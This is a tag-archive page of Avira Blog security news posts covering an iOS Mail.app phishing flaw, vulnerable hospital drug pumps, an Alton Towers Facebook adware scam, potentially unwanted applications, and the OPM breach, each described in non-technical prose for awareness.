Tag Archives: Threats

Avira

Flaw in Mail.app Can Be Used to Hijack iCloud Password

The flaw lies in the Mail.app, Apples default e-mail program for iOS. According to security researcher Jan Sourcek “this bug allows remote HTML content to be loaded, replacing the content of the original e-mail message. JavaScript is disabled in this UIWebView, but it is still possible to build a functional password “collector” using simple HTML and CSS.“ To reduce suspicion the code even detects if someone has already visited the page in the past by using cookies. If this was the case it stops displaying the password prompt.

This means that hackers could easily create phishing mails which show a form that looks exactly like the iCloud login pop-up window everyone knows. The user would be asked for their username and password, which – once entered – would then be transmitted to the cybercriminals.  Just take a look at the below concept-of-proof video to see how easy it would be to trick the unsuspecting user!

Sourcek discovered the flaw in January 2015 and informed Apple immediately. Since then no action has been taken in order to fix said vulnerability. In the hope that it will make Apple take the bug more seriously, the security researcher has now published his findings together with a proof-of-concept video and the corresponding code.

Feel free to follow this link in order to find out more about the issue.

The post Flaw in Mail.app Can Be Used to Hijack iCloud Password appeared first on Avira Blog.

Avira

Homicide no longer requires proximity

Although computerized hospital pumps are widely known to be beneficial for mitigating dosage errors, news of hackable hospital pumps came to public attention a few months ago when security researcher Billy Rios discovered a pump that doesn’t use authentication for its drug library – thus enabling a hacker to load a different library into the device, which in theory could lead to a deadly dose being delivered. But new findings by Rios indicate that hackers may now themselves be able to remotely administer a deadly dose of a drug to a patient.

The Vulnerabilities

According to Rios’s findings, a hacker could alter – from within the hospital computer network or even over the Internet – the allowable upper dosage limit to give either too low or too high a dose. Doctors or nurses could then accidentally set the machine to give too high or low a dose without the machine issuing an alert.

When the story initially broke, this alteration of dosage limits was not considered to be such a severe vulnerability as if the hacker could himself set the dosage amount (remotely). However, now Rios has found a new vulnerability that would allow hackers to remotely set the dosage amount by altering the firmware to gain total device control.

Coupling the previously known ability to change the drug library data with the newly found ability to remotely set the amount of the dose, a hacker can now potentially deliver a lethal dose of medication.

Pervasiveness of the Problem

How widespread the vulnerabilities are is yet unknown, but with estimates limited to just the one manufacturer whose pumps Rios discovered these vulnerabilities in, close to half a million intravenous medicine pumps globally could be affected.

Naïvety or Denial?

When Rios initially notified the company making the pumps in question, that its pumps could have their firmware changed by hackers, the company insisted that the pumps are safe because of partitioning between the comms module and motherboard. Rios found that, while the physical partition does exist, a serial cable connects the two components “in a way that you can actually change the core software on the pump.”

As the company uses this same approach for remotely delivering firmware updates to its computerized pumps, it is unclear as to why any computerized-equipment maker would be so skeptical of their own methods being used by hackers. Regardless, while the company works on a proof-of-concept that their devices have no vulnerabilities, Rios is working on his own proof-of-concept to the contrary, which he plans to share during the 2015 SummmerCon security conference in Brooklyn.

“You can talk to that communication module over the network or over a wireless network,” Rios told Wired (read the full Wired report here).

The post Homicide no longer requires proximity appeared first on Avira Blog.

Avira

Alton Towers Facebook Scam

Following an accident at Alton Towers – a theme and water park in the United Kingdom, a Facebook scam has emerged that purports to show video footage of the accident. Beware: this is a scam, which we shall now dissect for you.

Step 1: The hook

Alton Towers - step 1 the hook

This teaser Facebook post is supposedly taken from the accident (it is not). If you click on it with the (macabre) hope of seeing a video of the crash, you will be taken to a website that has been designed to look just like YouTube.

Step 2: The fake look-alike

Alton Towers fake youtube

Once on that page, you will be asked to post a link to the video on your Facebook timeline…

Step 3: The redirect

Once you accept to post the video to Facebook, you will be redirected to another website, where you will be told that to finally see that video, you need to download a video player update…

Alton Towers - step 3 the redirect

The downloaded file contains adware, that display advertisements and collects information about your browsing habits. The crooks almost certainly make money by getting a percentage of all sales on these third party ads you will be seeing in your browser.

If you see this Alton Towers scam on Facebook, avoid it. If you click on a post that tells you to download a plugin or update to watch the video, exit the page immediately. And for additional security, use Avira Free Antivirus, which blocks adware.

The post Alton Towers Facebook Scam appeared first on Avira Blog.

Avira

Opt-out from Potentially Unwanted Applications

This new Avira video will bring back the memories and will show you why it’s important to pay close attention all throughout the installation process of every new program on your device.

Do you know what’s in the bundle?

Potentially Unwanted Applications are usually more or less hidden in software bundles. In other words, while you are under the impression of installing only one program on your computer, you agree in fact to install additional services that might completely damage the regular activities you lead on your device.

Your computer will be slower than ever, unfamiliar programs will appear on your desktop and your browser will make you feel like it’s Christmas every day: pop-ups, ads… not to mention a collection of useless toolbars. Not exactly the kind of surprises that would be welcomed in the most wonderful time of the year but just as colored, noisy and cheerful.

Whenever you are planning to install new programs on your computer, make sure to read carefully through the terms and conditions of the agreement and opt-out from any action that leads to installing potentially unwanted applications in the process.

Sometimes, protecting your computer is a simple as that: unchecking the right boxes at the right time.

Tweet

As a security company, many of our efforts have been directed towards stopping potentially unwanted applications from spreading. Earlier this year we released a new set of ethical guidelines for all vendors and distribution partners to respect little time after our CEO, Travis Witteveen, wrote on our blog about the dangers associated to PUAs. We’re doing everything possible to protect you from any kind a digital threat so make sure you are fully aware of all digital risks associated to software downloads and stay safe.

The post Opt-out from Potentially Unwanted Applications appeared first on Avira Blog.

Avira

OPM Data Breach: Data of 4 Million Federal Workers Exposed

According to the official news release, hackers managed to breach the Office of Personnel Management (OPM). With the information of 4 million federal government workers exposed, it is one of the biggest in the federal government’s history. The hack was discovered because “within the last year, the OPM has undertaken an aggressive effort to update its cybersecurity posture, adding numerous tools and capabilities to its networks”.

In order to determine the full impact the OPM is now investigating the issue together with the U.S. Department of Homeland Security’s Computer Emergency Readiness Team (US-CERT) and the Federal Bureau of Investigation (FBI).

In their statement the agency wrote: “Since the intrusion, OPM has instituted additional network security precautions, including: restricting remote access for network administrators and restricting network administration functions remotely; a review of all connections to ensure that only legitimate business connections have access to the internet; and deploying anti-malware software across the environment to protect and prevent the deployment or execution of tools that could compromise the network.”

Sounds all good, but who is to blame? According to The Washington Post and the Wall Street Journal the hackers might have been Chinese, a link that China’s Foreign Ministry Spokesman calls “irresponsible”.

The post OPM Data Breach: Data of 4 Million Federal Workers Exposed appeared first on Avira Blog.